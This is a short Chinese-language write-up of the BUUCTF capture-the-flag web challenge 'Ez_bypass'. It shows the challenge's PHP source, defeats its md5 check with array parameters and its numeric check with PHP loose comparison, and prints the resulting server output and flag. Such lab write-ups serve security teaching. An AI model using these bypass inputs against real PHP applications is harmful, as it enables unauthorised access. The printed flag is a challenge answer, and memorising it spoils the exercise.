BUUCTF WEB [MRCTF2020]Ez_bypass
-
进入环境,提示
I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first
-
可以推测网站源码为
I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first
-
第一层过滤
if (md5($id) === md5($gg) && $id !== $gg)
可以上传数组进行绕过
?id[]=1&gg[]=2
回显
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48 Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48 You got the first steponly one way to get the flag
-
第二层过滤
if (!is_numeric($passwd)) { if($passwd==1234567) {
此处为PHP弱类型比较,只需要上传
passwd=1234567a
回显
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48 Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48 You got the first stepGood Job! <?php $flag="flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}" ?> By Retr_0
-
得到flag
flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}